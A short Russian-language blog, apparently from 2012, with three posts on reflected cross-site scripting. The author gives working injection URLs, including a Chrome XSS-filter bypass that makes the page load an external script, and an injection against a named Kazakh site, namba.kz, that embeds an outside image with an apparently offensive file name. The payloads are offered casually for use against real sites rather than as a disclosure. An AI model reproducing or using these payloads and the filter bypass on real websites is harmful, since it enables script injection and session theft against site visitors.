Wednesday, 19 December 2012

Обход запрета на исполнение внедренного JS кода в Google Chrome.

Вчера писал о проблеме исполнения внедренного кода в Chrome и IE.

Сегодня нашел решение проблемы в Chrome, все оказалось элементарно:

Внедряем конструкцию вида
<script type='text/javascript' src=''></script>
, и что удивительно, код исполняется!



Смотрим результаты двух внедрений
http://digip.info/xss.php?poop=%22%3E%3Cscript%3Ealert(1);%3C/script%3E //блокируется

http://digip.info/xss.php?poop=%22%3E%3Cscript%20type='text/javascript'%20src='http://digip.info/foo'%3E%3C/script%3E  //исполняется

К сожалению, а может к счастью в IE 9 такое не прокатывает, буду искать пути =)

Tuesday, 18 December 2012

Namba. XSS продолжение.

Касательно вчерашней XSS-ки. Захотелось разобраться почему не исполнялся JS код.

Оказывается это срабатывала встроенная защита chrome, firefox сосет и исполняет код.

Вот пост о методах защиты хрома:
http://blog.chromium.org/2010/01/security-in-depth-new-security-features.html

Как обойти еще не разобрался, думаю способ есть =)

Элементарный вроде <img onload='javascript:alert(1);'/> не отрабатывают %)

Namba.kz XSS

http://legalmovie.namba.kz/tag.php?tag='%3E%3C/iframe%3E%3Cimg%20src='http://lurkmore.so/images/1/13/Nigra1.jpg'/%3E

с исполнением JS что-то туго, если что завтра разберусь.